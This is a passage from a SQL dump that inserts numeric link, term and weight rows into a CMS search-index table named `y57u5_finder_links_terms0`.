(240, 274571, 1.91338),
(240, 274572, 0.86331),
(240, 274573, 0.95669),
(240, 274574, 0.95669),
(240, 274575, 1.00331),
(240, 274576, 0.91),
(240, 274577, 0.98),
(240, 274578, 0.98),
(240, 274579, 0.84),
(240, 274580, 0.91),
(240, 274581, 0.91),
(240, 274582, 1.00331),
(240, 274583, 1.14331),
(240, 274584, 0.98),
(240, 274585, 0.88669),
(240, 274586, 1.07331),
(240, 274587, 1.00331),
(240, 274588, 1.23669),
(240, 274589, 0.98),
(240, 274590, 1.21331),
(240, 274591, 0.93331),
(240, 274592, 0.98),
(240, 274593, 0.98),
(240, 274594, 1.09669),
(240, 274595, 0.32669),
(240, 274596, 0.93331),
(240, 274597, 1.07331),
(240, 274598, 1.00331),
(240, 274599, 1.09669),
(240, 274600, 1.14331),
(240, 274601, 0.98),
(240, 274602, 1.09669),
(240, 274603, 0.32669),
(287, 274603, 0.32669),
(240, 274604, 0.95669),
(240, 274605, 1.14331),
(240, 274606, 1.02669),
(240, 274607, 1.21331),
(240, 274608, 2.00662),
(240, 274609, 1.16669),
(240, 274610, 1.14331),
(240, 274611, 1.07331),
(240, 274612, 1.16669),
(240, 274613, 1.21331),
(240, 274614, 1.30669),
(240, 274615, 1.09669),
(240, 274616, 1.09669),
(240, 274617, 0.88669),
(240, 274618, 1.00331),
(240, 274619, 1.07331),
(240, 274620, 0.93331),
(240, 274621, 1.05),
(240, 274622, 1.09669),
(240, 274623, 1.19),
(240, 274624, 0.98),
(240, 274625, 1.05),
(240, 274626, 0.86331),
(240, 274627, 1.05),
(240, 274628, 0.95669),
(240, 274629, 1.05),
(240, 274630, 1.00331),
(240, 274631, 1.07331),
(240, 274632, 0.91),
(240, 274633, 1.09669),
(240, 274634, 0.91),
(240, 274635, 1.09669),
(240, 274636, 0.86331),
(240, 274637, 0.95669),
(240, 274638, 1.02669),
(240, 274639, 1.26),
(240, 274640, 0.91),
(240, 274641, 1.02669),
(240, 274642, 0.95669),
(240, 274643, 0.91),
(240, 274644, 0.98),
(240, 274645, 0.95669),
(240, 274646, 1.05),
(240, 274647, 0.98),
(240, 274648, 1.05),
(240, 274649, 0.91),
(240, 274650, 0.95669),
(240, 274651, 1.02669),
(240, 274652, 1.05),
(240, 274653, 0.98),
(240, 274654, 1.05),
(240, 274655, 1.14331),
(240, 274656, 0.88669),
(240, 274657, 1.12),
(240, 274658, 0.93331),
(288, 274658, 0.93331),
(240, 274659, 1.12),
(240, 274660, 0.95669),
(240, 274661, 1.07331),
(240, 274662, 0.98),
(240, 274663, 0.93331),
(240, 274664, 1.02669),
(240, 274665, 0.95669),
(240, 274666, 1.07331),
(240, 274667, 0.93331),
(240, 274668, 1.02669),
(240, 274669, 1.05),
(240, 274670, 1.12),
(240, 274671, 0.98),
(240, 274672, 1.05),
(240, 274673, 0.93331),
(240, 274674, 1.02669),
(240, 274675, 0.93331),
(240, 274676, 1.05),
(240, 274677, 0.88669),
(240, 274678, 1.09669),
(240, 274679, 1.14331),
(240, 274680, 1.26),
(240, 274681, 0.98),
(240, 274682, 0.98),
(240, 274683, 1.00331),
(240, 274684, 1.00331),
(240, 274685, 3.29007),
(240, 274686, 1.19),
(240, 274687, 1.19),
(240, 274688, 1.19),
(240, 274689, 1.02669),
(240, 274690, 1.12),
(240, 274691, 0.91),
(240, 274692, 0.98),
(240, 274693, 0.98),
(240, 274694, 1.02669),
(240, 274695, 1.05),
(240, 274696, 0.28),
(240, 274697, 1.02669),
(240, 274698, 1.19),
(240, 274699, 1.02669),
(240, 274700, 1.09669),
(240, 274701, 1.02669),
(240, 274702, 1.16669),
(240, 274703, 0.93331),
(240, 274704, 1.21331),
(240, 274705, 0.84),
(240, 274706, 0.93331),
(240, 274707, 2.19338),
(240, 274708, 0.86331),
(240, 274709, 0.93331),
(240, 274710, 1.02669),
(240, 274711, 1.00331),
(240, 274712, 1.07331),
(240, 274713, 0.91),
(240, 274714, 0.98),
(240, 274715, 0.98),
(240, 274716, 1.09669),
(240, 274717, 1.02669),
(240, 274718, 0.84),
(240, 274719, 1.00331),
(240, 274720, 0.98),
(240, 274721, 0.98),
(240, 274722, 1.12),
(240, 274723, 1.09669),
(240, 274724, 1.09669),
(240, 274725, 1.09669),
(240, 274726, 1.07331),
(240, 274727, 0.84),
(240, 274728, 0.91),
(240, 274729, 0.88669),
(240, 274730, 1.00331),
(240, 274731, 0.98),
(240, 274732, 1.09669),
(240, 274733, 1.07331),
(240, 274734, 1.14331),
(240, 274735, 0.91),
(240, 274736, 0.98),
(240, 274737, 0.91),
(240, 274738, 0.98),
(240, 274739, 0.84),
(240, 274740, 1.14331),
(240, 274741, 0.98),
(240, 274742, 1.00331),
(240, 274743, 1.00331),
(240, 274744, 1.09669),
(240, 274745, 1.00331),
(240, 275642, 0.98),
(240, 275643, 1.09669),
(240, 275644, 1.00331),
(240, 275645, 1.14331),
(240, 275646, 0.84),
(240, 275647, 0.93331),
(240, 275648, 0.95669),
(240, 275649, 1.05),
(240, 275650, 1.09669),
(240, 275651, 1.07331),
(240, 275652, 0.32669),
(240, 275653, 0.95669),
(240, 275654, 1.07331),
(240, 275655, 1.00331),
(240, 275656, 1.09669),
(240, 275657, 1.02669),
(240, 275658, 1.16669),
(240, 275659, 1.02669),
(240, 275660, 1.14331),
(240, 275661, 0.95669),
(240, 275662, 1.19),
(240, 275663, 0.93331),
(240, 275664, 1.09669),
(240, 275665, 0.93331),
(240, 275666, 1.02669),
(240, 275667, 0.86331),
(240, 275668, 0.95669),
(240, 275669, 0.28),
(240, 275670, 0.93331),
(240, 275671, 1.05),
(240, 275672, 1.02669),
(304, 275672, 4.10676),
(240, 275673, 1.14331),
(240, 275674, 1.05),
(240, 275675, 1.05),
(240, 275676, 1.14331),
(240, 275677, 1.09669),
(240, 275678, 1.02669),
(240, 275679, 1.16669),
(240, 275680, 0.28),
(240, 275681, 0.98),
(240, 275682, 1.07331),
(240, 275683, 0.98),
(240, 275684, 1.19),
(240, 275685, 0.93331),
(240, 275686, 1.00331),
(240, 275687, 0.95669),
(240, 275688, 1.09669),
(240, 275689, 0.14),
(240, 275690, 0.88669),
(240, 275691, 1.00331),
(240, 275692, 0.93331),
(240, 275693, 1.30669),
(240, 275694, 1.02669),
(240, 275695, 1.12),
(240, 275696, 0.86331),
(240, 275697, 0.93331),
(240, 275698, 0.84),
(240, 275699, 0.91),
(240, 275700, 1.09669),
(240, 275701, 1.14331),
(240, 275702, 0.93331),
(240, 275703, 1.00331),
(240, 275704, 1.00331),
(240, 275705, 1.09669),
(240, 275706, 0.37331),
(240, 275707, 0.95669),
(240, 275708, 1.00331),
(240, 275709, 1.00331),
(240, 275710, 1.21331),
(240, 275711, 1.00331),
(240, 275712, 0.91),
(240, 275713, 1.00331),
(240, 275714, 1.02669),
(240, 275715, 1.14331),
(240, 275716, 1.86662),
(240, 275717, 1.07331),
(240, 275718, 1.05),
(240, 275719, 0.28),
(240, 275720, 0.93331),
(240, 275721, 1.05),
(240, 275722, 0.95669),
(240, 275723, 1.02669),
(240, 275724, 0.95669),
(304, 275724, 1.91338),
(240, 275725, 1.05),
(240, 275726, 1.05),
(240, 275727, 1.14331),
(240, 275728, 1.09669),
(240, 275729, 1.19),
(240, 275730, 2.19338),
(240, 275731, 1.26),
(240, 275732, 1.30669),
(240, 275733, 1.07331),
(240, 275734, 1.30669),
(240, 275735, 0.95669),
(240, 275736, 1.05),
(240, 275737, 0.93331),
(240, 275738, 1.00331),
(240, 275739, 0.93331),
(240, 275740, 1.00331),
(240, 275741, 1.00331),
(240, 275742, 1.09669),
(240, 275743, 0.88669),
(240, 275744, 1.14331),
(240, 275745, 1.14331),
(240, 275746, 0.98),
(240, 275747, 1.07331),
(240, 275748, 1.00331),
(240, 275749, 1.26),
(240, 275750, 0.32669),
(240, 275751, 0.93331),
(240, 275752, 1.07331),
(240, 275753, 0.7),
(240, 275754, 1.16669),
(240, 275755, 1.28331),
(240, 275756, 1.33),
(240, 275757, 1.09669),
(240, 275758, 0.98),
(240, 275759, 1.12),
(240, 275760, 0.37331),
(240, 275761, 1.00331),
(240, 275762, 1.14331),
(240, 275763, 0.32669),
(240, 275764, 0.93331),
(240, 275765, 1.02669),
(240, 275766, 1.09669),
(240, 275767, 1.02669),
(240, 275768, 1.21331),
(241, 276556, 1.02669),
(241, 276557, 0.93331),
(241, 276558, 1.05),
(241, 276559, 1.05),
(241, 276560, 0.93331),
(241, 276561, 0.95669),
(305, 276561, 0.95669),
(241, 276562, 0.84),
(241, 276563, 0.93331),
(241, 276564, 1.05),
(241, 276565, 1.23669),
(241, 276566, 1.00331),
(241, 276567, 1.07331),
(241, 276568, 0.95669),
(241, 276569, 1.05),
(241, 276570, 0.91),
(241, 276571, 1.02669),
(241, 276572, 0.98),
(241, 276573, 0.93331),
(241, 276574, 1.05),
(241, 276575, 0.98),
(241, 276576, 1.14331),
(241, 276577, 1.02669),
(241, 276578, 1.19),
(241, 276579, 0.95669),
(241, 276580, 1.07331),
(241, 276581, 1.02669),
(241, 276582, 1.16669),
(241, 276583, 1.02669),
(241, 276584, 1.09669),
(241, 276585, 0.84),
(241, 276586, 0.93331),
(241, 276587, 0.93331),
(292, 276587, 0.93331),
(241, 276588, 0.98),
(241, 276589, 0.98),
(241, 276590, 1.00331),
(241, 276591, 1.02669),
(241, 276592, 1.12),
(241, 276593, 1.09669),
(241, 276594, 0.95669),
(241, 276595, 0.91),
(241, 276596, 1.05),
(241, 276597, 1.05),
(241, 276598, 0.95669),
(241, 276599, 2.42662),
(241, 276600, 0.98),
(241, 276601, 1.09669),
(241, 276602, 1.09669),
(241, 276603, 0.93331),
(241, 276604, 1.00331),
(241, 276605, 0.95669),
(241, 276606, 1.09669),
(241, 276607, 1.00331),
(241, 276608, 1.12),
(241, 276609, 0.98),
(241, 276610, 1.09669),
(241, 276611, 0.88669),
(241, 276612, 0.95669),
(241, 276613, 1.00331),
(241, 276614, 0.93331),
(241, 276615, 1.72662),
(241, 276616, 1.09669),
(241, 276617, 1.00331),
(241, 276618, 0.86331),
(306, 276618, 0.86331),
(241, 276619, 1.02669),
(305, 276620, 0.93331),
(241, 276620, 1.86662),
(241, 276621, 0.98),
(241, 276622, 0.98),
(241, 276623, 1.07331),
(241, 277075, 0.93331),
(241, 277076, 1.00331),
(241, 277077, 0.98),
(241, 277078, 0.88669),
(241, 277079, 0.93331),
(241, 277080, 0.95669),
(241, 277081, 1.07331),
(241, 277082, 0.86331),
(241, 277083, 0.95669),
(241, 277084, 1.00331),
(241, 277085, 1.12),
(241, 277086, 0.32669),
(292, 277086, 1.30676),
(241, 277087, 1.00331),
(241, 277088, 1.21331),
(241, 277089, 1.02669),
(241, 277090, 1.12),
(241, 277091, 0.95669),
(241, 277092, 1.00331),
(241, 277093, 1.02669),
(241, 277094, 1.77338),
(241, 277095, 0.98),
(241, 277096, 0.98),
(241, 277097, 0.46662),
(241, 277098, 0.88669),
(241, 277099, 1.00331),
(241, 277100, 0.91),
(241, 277101, 1.14331),
(241, 277102, 0.91),
(241, 277103, 1.12),
(241, 277104, 1.14331),
(241, 277105, 0.84),
(241, 277106, 1.05),
(241, 277107, 0.81669),
(241, 277108, 1.02669),
(241, 277109, 0.91),
(241, 277110, 0.98),
(241, 277111, 1.82),
(241, 277112, 1.96),
(241, 277113, 2.05338),
(241, 277114, 1.12),
(241, 277115, 1.16669),
(241, 277116, 1.07331),
(241, 277117, 1.16669),
(241, 277118, 0.91),
(241, 277119, 1.07331),
(241, 277120, 1.77338),
(241, 277121, 0.95669),
(241, 277122, 1.12),
(241, 277123, 0.37331),
(241, 277124, 1.00331),
(241, 277125, 1.12),
(241, 277126, 0.93331),
(241, 277127, 1.00331),
(241, 277128, 1.02669),
(241, 277129, 0.93331),
(241, 277130, 1.02669),
(241, 277131, 0.42),
(241, 277132, 0.91),
(241, 277133, 0.98),
(241, 277134, 0.88669),
(241, 277135, 0.95669),
(241, 277136, 0.91),
(241, 277137, 0.98),
(241, 277138, 1.26),
(241, 277139, 1.35331),
(241, 277140, 0.46669),
(241, 277141, 1.02669),
(241, 277142, 1.14331),
(242, 277622, 0.88669),
(242, 277623, 1.00331),
(242, 277624, 1.00331),
(242, 277625, 1.16669),
(242, 277626, 1.12),
(242, 277627, 1.05),
(242, 277628, 1.12),
(242, 277629, 1.02669),
(242, 277630, 3.15),
(242, 277631, 1.12),
(242, 277632, 1.07331),
(242, 277633, 0.93331),
(242, 277634, 1.14331),
(242, 277635, 0.88669),
(242, 277636, 0.98),
(242, 277637, 0.86331),
(242, 277638, 1.07331),
(242, 277639, 2.47338),
(242, 277640, 0.98),
(242, 277641, 1.05),
(242, 277642, 0.91),
(242, 277643, 1.05),
(242, 277644, 0.93331),
(242, 277645, 1.05),
(242, 277646, 0.95669),
(242, 277647, 1.02669),
(242, 277648, 0.98),
(242, 277649, 1.21331),
(242, 277650, 0.86331),
(242, 277651, 0.93331),
(242, 277652, 0.93331),
(242, 277653, 0.91),
(242, 277654, 0.98),
(242, 277655, 0.98),
(242, 277656, 0.95669),
(242, 277657, 1.19),
(242, 277658, 0.98),
(242, 277659, 1.05),
(242, 277660, 1.00331),
(242, 277661, 1.12),
(242, 277662, 0.88669),
(242, 277663, 0.95669),
(242, 277664, 1.16669),
(242, 277665, 0.95669),
(242, 277666, 1.05),
(242, 277667, 1.12),
(242, 277668, 0.86331),
(242, 277669, 0.95669),
(242, 277670, 0.88669),
(242, 277671, 0.98),
(242, 277672, 0.56),
(242, 277673, 1.91338),
(242, 277674, 2.1),
(242, 277675, 1.05),
(242, 277676, 1.14331),
(242, 277677, 1.02669),
(242, 277678, 1.00331),
(242, 277679, 0.86331),
(242, 277680, 0.91),
(242, 277681, 0.91),
(242, 277682, 0.98),
(242, 277683, 0.98),
(242, 277684, 1.07331),
(242, 277685, 1.00331),
(242, 277686, 1.00331),
(242, 277687, 0.98),
(242, 277688, 1.05),
(242, 277689, 0.86331),
(242, 277690, 0.91),
(242, 277691, 1.00331),
(242, 277692, 1.12),
(242, 277693, 1.07331),
(242, 277694, 2.00662),
(242, 277695, 1.14331),
(242, 277696, 1.12),
(242, 277697, 1.00331),
(242, 277698, 1.21331),
(242, 277699, 1.07331),
(242, 277700, 1.16669),
(242, 277701, 1.14331),
(242, 277702, 0.86331),
(242, 277703, 0.93331),
(242, 277704, 0.93331),
(242, 277705, 1.00331),
(242, 277706, 0.95669),
(242, 277707, 1.00331),
(242, 277708, 1.07331),
(242, 277709, 0.88669),
(242, 277710, 0.95669),
(242, 277711, 0.95669),
(242, 277712, 1.05),
(242, 277713, 1.02669),
(242, 277714, 1.09669),
(242, 277715, 1.02669),
(242, 277716, 1.12),
(242, 277717, 1.12),
(242, 277718, 1.23669),
(242, 277719, 0.95669),
(242, 277720, 1.21331),
(242, 277721, 0.91),
(242, 277722, 1.12),
(242, 277723, 0.88669),
(242, 277724, 0.98),
(242, 277725, 0.98),
(242, 277726, 0.98),
(242, 277727, 1.00331),
(242, 277728, 0.93331),
(242, 277729, 1.05),
(242, 277730, 0.98),
(242, 277731, 1.12),
(242, 277732, 1.05),
(242, 277733, 1.02669),
(242, 277734, 0.98),
(242, 277735, 1.09669),
(242, 277736, 0.88669),
(242, 277737, 0.95669),
(242, 277738, 0.93331),
(242, 277739, 1.02669),
(242, 277740, 0.95669),
(242, 277741, 1.05),
(242, 277742, 0.93331),
(242, 277743, 1.00331),
(242, 277744, 0.88669),
(242, 277745, 1.00331),
(242, 277746, 0.91),
(242, 277747, 1.14331),
(242, 277748, 1.12),
(242, 277749, 0.98),
(242, 277750, 1.19),
(242, 277751, 0.98),
(242, 277752, 1.07331),
(242, 277753, 1.05),
(242, 277754, 1.23669),
(242, 277755, 1.02669),
(242, 277756, 1.09669),
(242, 277757, 0.91),
(242, 277758, 1.02669),
(242, 277759, 0.98),
(242, 277760, 0.91),
(242, 277761, 0.98),
(242, 277762, 0.95669),
(242, 277763, 1.07331),
(242, 277764, 1.07331),
(242, 277765, 1.21331),
(242, 277766, 1.00331),
(242, 277767, 1.09669),
(242, 277768, 1.07331),
(242, 277769, 0.37331),
(242, 277770, 1.05),
(242, 277771, 1.12),
(242, 277772, 0.98),
(242, 277773, 1.14331),
(242, 277774, 1.02669),
(242, 277775, 1.12),
(242, 277776, 0.98),
(242, 277777, 1.05),
(242, 277778, 0.88669),
(242, 277779, 0.98),
(242, 277780, 1.02669),
(242, 277781, 1.14331),
(242, 277782, 0.93331),
(242, 277783, 0.98),
(242, 277784, 0.28),
(242, 277785, 1.05),
(242, 277786, 1.12),
(242, 277787, 1.05),
(242, 277788, 0.91),
(242, 277789, 1.09669),
(242, 277790, 0.86331),
(242, 277791, 0.93331),
(242, 277792, 0.86331),
(242, 277793, 0.93331),
(242, 277794, 0.98),
(242, 277795, 1.05),
(242, 277796, 1.02669),
(242, 277797, 0.91),
(242, 277798, 1.02669),
(242, 277799, 1.72662),
(242, 277800, 0.93331),
(242, 277801, 0.98),
(242, 277802, 0.95669),
(242, 277803, 1.02669),
(242, 277804, 0.81669),
(242, 277805, 1.02669);
INSERT INTO `y57u5_finder_links_terms0` (`link_id`, `term_id`, `weight`) VALUES
(242, 277806, 1.00331),
(242, 277807, 0.95669),
(242, 277808, 1.09669),
(242, 277809, 0.93331),
(242, 277810, 0.88669),
(242, 277811, 0.98),
(242, 277812, 1.00331),
(242, 277813, 1.07331),
(242, 277814, 0.42),
(242, 277815, 0.98),
(242, 277816, 1.07331),
(242, 277817, 0.98),
(242, 277818, 1.02669),
(242, 277819, 1.07331),
(242, 277820, 0.23331),
(242, 277821, 0.93331),
(242, 277822, 1.09669),
(242, 277823, 1.02669),
(242, 279016, 0.86331),
(242, 279017, 0.95669),
(242, 279018, 0.91),
(242, 279019, 1.12),
(242, 279020, 0.88669),
(242, 279021, 1.05),
(242, 279022, 0.93331),
(242, 279023, 1.07331),
(242, 279024, 0.93331),
(242, 279025, 1.07331),
(242, 279026, 1.19),
(242, 279027, 1.02669),
(242, 279028, 1.09669),
(242, 279029, 1.19),
(242, 279030, 1.30669),
(242, 279031, 1.05),
(242, 279032, 1.19),
(242, 279033, 0.95669),
(242, 279034, 1.05),
(242, 279035, 0.42),
(242, 279036, 1.05),
(242, 279037, 1.19),
(242, 279038, 0.28),
(242, 279039, 0.98),
(242, 279040, 1.12),
(242, 279041, 0.86331),
(288, 279041, 0.86331),
(242, 279042, 1.00331),
(242, 279043, 0.91),
(242, 279044, 1.00331),
(242, 279045, 0.32669),
(242, 279046, 0.98),
(242, 279047, 1.09669),
(242, 279048, 0.37331),
(242, 279049, 1.00331),
(242, 279050, 1.09669),
(242, 279051, 0.18669),
(242, 279052, 0.98),
(242, 279053, 1.30669),
(242, 279054, 1.14331),
(242, 279055, 1.16669),
(242, 279056, 1.02669),
(242, 279057, 0.98),
(242, 279058, 1.00331),
(242, 279059, 1.07331),
(242, 279060, 0.14),
(242, 279061, 0.93331),
(242, 279062, 1.05),
(242, 279063, 1.00331),
(242, 279064, 0.98),
(242, 279065, 1.09669),
(242, 279066, 1.16669),
(242, 279067, 1.02669),
(242, 279068, 1.16669),
(242, 279069, 0.93331),
(242, 279070, 1.05),
(242, 279071, 0.42),
(242, 279072, 0.98),
(242, 279073, 1.12),
(242, 279074, 0.91),
(242, 279075, 1.09669),
(242, 279076, 0.37331),
(242, 279077, 1.00331),
(242, 279078, 1.12),
(242, 279079, 0.93331),
(242, 279080, 1.05),
(242, 279081, 0.88669),
(242, 279082, 1.09669),
(242, 279083, 0.86331),
(242, 279084, 0.95669),
(242, 279085, 0.98),
(242, 279086, 1.23669),
(242, 279087, 0.98),
(242, 279088, 1.12),
(242, 279089, 1.09669),
(242, 279090, 1.16669),
(242, 279091, 1.02669),
(242, 279092, 1.14331),
(242, 279093, 0.28),
(242, 279094, 0.93331),
(242, 279095, 1.07331),
(242, 279096, 1.05),
(242, 279097, 1.12),
(242, 279098, 0.88669),
(242, 279099, 1.00331),
(242, 279100, 0.42),
(242, 279101, 1.00331),
(242, 279102, 1.21331),
(242, 279103, 1.02669),
(242, 279104, 1.21331),
(242, 279105, 0.84),
(242, 279106, 0.93331),
(242, 279107, 0.23331),
(242, 279108, 0.88669),
(242, 279109, 1.16669),
(242, 279110, 0.95669),
(242, 279111, 1.00331),
(242, 279112, 1.05),
(242, 279113, 1.16669),
(242, 279114, 0.32669),
(242, 279115, 0.98),
(242, 279116, 1.21331),
(242, 279117, 0.95669),
(242, 279118, 1.02669),
(242, 279119, 0.93331),
(242, 279120, 1.12),
(242, 279121, 0.56),
(242, 279122, 0.88669),
(242, 279123, 0.98),
(242, 279124, 0.95669),
(242, 279125, 1.26),
(242, 279126, 1.07331),
(242, 279127, 1.14331),
(242, 279128, 1.12),
(242, 279129, 1.09669),
(242, 279130, 1.21331),
(242, 279131, 0.88669),
(242, 279132, 1.00331),
(242, 279133, 1.09669),
(242, 279134, 1.02669),
(242, 279135, 1.14331),
(242, 279136, 0.98),
(242, 279137, 1.07331),
(242, 279138, 1.05),
(242, 279139, 0.93331),
(242, 279140, 1.02669),
(242, 279141, 0.98),
(242, 279142, 0.88669),
(242, 279143, 1.00331),
(242, 279144, 0.88669),
(242, 279145, 1.00331),
(242, 279146, 1.00331),
(242, 279147, 0.37331),
(242, 279148, 0.98),
(242, 279149, 1.12),
(242, 279150, 1.16669),
(242, 279151, 1.23669),
(242, 279152, 1.02669),
(242, 279153, 0.23331),
(242, 279154, 1.05),
(242, 279155, 1.23669),
(243, 281733, 1.00331),
(243, 281734, 1.23669),
(243, 281735, 0.91),
(243, 281736, 1.07331),
(243, 281737, 8.73981),
(243, 281738, 1.00331),
(243, 281739, 1.07331),
(243, 281740, 0.86331),
(243, 281741, 0.98),
(243, 281742, 0.98),
(243, 281743, 0.95669),
(243, 281744, 1.09669),
(243, 281745, 1.14331),
(243, 281746, 0.98),
(243, 281747, 0.95669),
(243, 281748, 1.02669),
(243, 281749, 1.09669),
(243, 281750, 1.28331),
(243, 281751, 0.98),
(243, 281752, 1.00331),
(243, 281753, 1.14331),
(243, 281754, 0.37331),
(243, 281755, 0.93331),
(243, 281756, 1.07331),
(243, 281757, 1.02669),
(243, 281758, 0.93331),
(243, 281759, 1.14331),
(243, 281760, 0.86331),
(243, 281761, 0.91),
(243, 281762, 0.91),
(243, 281763, 1.12),
(243, 281764, 0.95669),
(243, 281765, 1.12),
(243, 281766, 0.95669),
(243, 281767, 1.12),
(243, 281768, 1.72662),
(243, 281769, 1.96),
(243, 281770, 0.93331),
(243, 281771, 1.00331),
(243, 281772, 0.93331),
(243, 281773, 1.05),
(243, 281774, 0.93331),
(243, 281775, 0.93331),
(243, 281776, 0.98),
(243, 281777, 0.93331),
(243, 281778, 1.09669),
(243, 281779, 0.98),
(243, 281780, 0.91),
(243, 281781, 0.98),
(243, 281782, 0.98),
(243, 281783, 1.12),
(243, 281784, 0.95669),
(243, 281785, 1.05),
(243, 281786, 0.98),
(243, 281787, 1.05),
(243, 281788, 0.98),
(243, 281789, 1.00331),
(243, 281790, 1.00331),
(243, 281791, 0.95669),
(243, 281792, 1.07331),
(243, 281793, 1.02669),
(243, 281794, 0.88669),
(243, 281795, 0.98),
(243, 281796, 0.98),
(243, 281797, 1.07331),
(243, 281798, 0.98),
(243, 281799, 1.05),
(243, 281800, 0.88669),
(243, 281801, 0.95669),
(243, 281802, 1.05),
(243, 281803, 4.38676),
(243, 281804, 0.98),
(243, 281805, 1.12),
(243, 281806, 1.14331),
(243, 281807, 1.05),
(243, 281808, 1.16669),
(243, 281809, 0.95669),
(243, 281810, 1.14331),
(243, 281811, 0.95669),
(243, 281812, 1.07331),
(243, 281813, 0.95669),
(243, 282427, 0.91),
(243, 282428, 1.02669),
(243, 282429, 0.93331),
(243, 282430, 1.16669),
(243, 282431, 0.98),
(243, 282432, 1.09669),
(243, 282433, 0.98),
(243, 282434, 0.88669),
(243, 282435, 1.00331),
(243, 282436, 0.98),
(243, 282437, 1.09669),
(243, 282438, 0.93331),
(243, 282439, 1.02669),
(243, 282440, 0.95669),
(243, 282441, 1.05),
(243, 282442, 0.37331),
(287, 282442, 0.37331),
(243, 282443, 0.98),
(243, 282444, 1.07331),
(243, 282445, 0.32669),
(290, 282445, 0.32669),
(243, 282446, 1.00331),
(243, 282447, 1.09669),
(243, 282448, 0.84),
(243, 282449, 0.93331),
(243, 282450, 1.07331),
(243, 282451, 1.14331),
(243, 282452, 0.86331),
(243, 282453, 1.00331),
(243, 282454, 0.88669),
(243, 282455, 1.05),
(243, 282456, 1.91338),
(243, 282457, 1.14331),
(243, 282458, 1.16669),
(243, 282459, 1.07331),
(243, 282460, 1.23669),
(243, 282461, 1.4),
(243, 282462, 1.09669),
(243, 282463, 1.19),
(243, 282464, 1.16669),
(243, 282465, 1.26),
(243, 282466, 0.91),
(243, 282467, 1.05),
(243, 282468, 0.28),
(243, 282469, 0.91),
(243, 282470, 1.00331),
(243, 282471, 1.00331),
(243, 282472, 0.28),
(243, 282473, 0.95669),
(243, 282474, 1.23669),
(243, 282475, 1.96),
(243, 282476, 1.07331),
(243, 282477, 1.09669),
(243, 282478, 0.98),
(243, 282479, 1.09669),
(243, 282480, 1.00331),
(243, 282481, 1.12),
(243, 282482, 1.09669),
(243, 282483, 0.95669),
(243, 282484, 1.05),
(243, 282485, 1.05),
(243, 282486, 1.16669),
(243, 282487, 0.91),
(243, 282488, 1.16669),
(243, 282489, 0.95669),
(243, 282490, 1.02669),
(243, 282491, 1.26),
(243, 282492, 2.94),
(243, 282493, 3.36),
(244, 283749, 1.05),
(244, 283750, 1.19),
(244, 283751, 0.95669),
(244, 283752, 1.02669),
(244, 283753, 0.84),
(244, 283754, 0.91),
(244, 283755, 0.88669),
(244, 283756, 1.00331),
(290, 283757, 0.86331),
(244, 283757, 1.72662),
(244, 283758, 0.98),
(244, 283759, 1.07331),
(244, 283760, 1.07331),
(244, 283761, 1.07331),
(244, 283762, 1.19),
(244, 283763, 1.07331),
(244, 283764, 0.91),
(244, 283765, 1.07331),
(244, 283766, 1.07331),
(244, 283767, 0.32669),
(244, 283768, 1.00331),
(244, 283769, 1.16669),
(244, 283770, 0.95669),
(244, 283771, 1.07331),
(244, 283772, 0.93331),
(244, 283773, 1.16669),
(244, 283774, 1.02669),
(244, 283775, 1.07331),
(244, 283776, 0.98),
(244, 283777, 0.98),
(244, 283778, 1.07331),
(244, 283779, 0.84),
(244, 283780, 0.95669),
(244, 283781, 0.86331),
(244, 283782, 1.02669),
(244, 283783, 0.86331),
(244, 283784, 0.93331),
(244, 283785, 0.95669),
(244, 283786, 0.46669),
(244, 283787, 1.00331),
(244, 283788, 1.12),
(244, 283789, 0.93331),
(244, 283790, 1.02669),
(244, 284242, 0.95669),
(244, 284243, 1.07331),
(244, 284244, 1.00331),
(244, 284245, 0.98),
(244, 284246, 1.05),
(244, 284247, 0.98),
(244, 284248, 1.23669),
(244, 284249, 1.07331),
(244, 284250, 0.88669),
(244, 284251, 0.98),
(244, 284252, 0.88669),
(244, 284253, 1.05),
(244, 284254, 0.88669),
(244, 284255, 0.98),
(244, 284256, 0.95669),
(244, 284257, 1.14331),
(244, 284258, 1.07331),
(244, 284259, 0.93331),
(244, 284260, 1.02669),
(244, 284261, 0.86331),
(244, 284262, 1.09669),
(244, 284263, 0.93331),
(244, 284264, 1.09669),
(244, 284265, 0.88669),
(292, 284265, 0.88669),
(244, 284266, 0.95669),
(244, 284267, 0.91),
(244, 284268, 1.00331),
(244, 284269, 1.12),
(244, 284270, 1.00331),
(244, 284271, 0.91),
(244, 284272, 1.02669),
(244, 284273, 0.93331),
(244, 284274, 1.07331),
(244, 284275, 1.02669),
(244, 284276, 0.88669),
(244, 284277, 1.00331),
(244, 284278, 0.93331),
(304, 284278, 0.93331),
(244, 284279, 1.05),
(244, 284280, 0.28),
(244, 284281, 0.91),
(244, 284282, 1.00331),
(244, 284283, 0.56),
(244, 284284, 1.12),
(244, 284285, 1.19),
(244, 284286, 1.00331),
(244, 284287, 1.07331),
(244, 284288, 0.88669),
(244, 284289, 1.02669),
(244, 284290, 0.91),
(244, 284291, 1.05),
(244, 284292, 0.98),
(244, 284293, 1.12),
(244, 284294, 0.95669),
(244, 284295, 1.14331),
(244, 284296, 0.93331),
(244, 284297, 1.09669),
(244, 284298, 0.95669),
(244, 284299, 1.07331),
(244, 284300, 0.32669),
(244, 284301, 0.93331),
(244, 284302, 1.16669),
(244, 284303, 0.32669),
(244, 284304, 1.12),
(244, 284305, 1.19),
(244, 284306, 0.98),
(244, 284307, 1.05),
(244, 284308, 0.91),
(244, 284309, 1.02669),
(244, 284310, 1.05),
(244, 284311, 0.88669),
(244, 284312, 1.05),
(244, 284313, 0.91),
(244, 284314, 1.00331),
(244, 284315, 0.95669),
(244, 284316, 1.16669),
(244, 284317, 1.05),
(244, 284318, 0.98),
(244, 284319, 1.23669),
(244, 284320, 0.91),
(244, 284321, 1.02669),
(244, 284322, 0.91),
(244, 284323, 1.07331),
(244, 284324, 0.28),
(244, 284325, 0.95669),
(244, 284326, 1.19),
(245, 284748, 0.88669),
(245, 284749, 1.00331),
(245, 284750, 1.07331),
(245, 284751, 0.91),
(245, 284752, 1.05),
(245, 284753, 0.98),
(245, 284754, 0.88669),
(245, 284755, 0.95669),
(245, 284756, 0.37331),
(245, 284757, 1.07331),
(245, 284758, 1.14331),
(245, 284759, 0.84),
(245, 284760, 1.00331),
(245, 284761, 0.51331),
(245, 284762, 1.02669),
(245, 284763, 1.23669),
(245, 284764, 0.86331),
(245, 284765, 1.02669),
(245, 284766, 1.00331),
(245, 284767, 0.91),
(245, 284768, 0.95669),
(245, 284769, 1.07331),
(245, 284770, 0.91),
(245, 284771, 1.05),
(245, 284772, 8.73981),
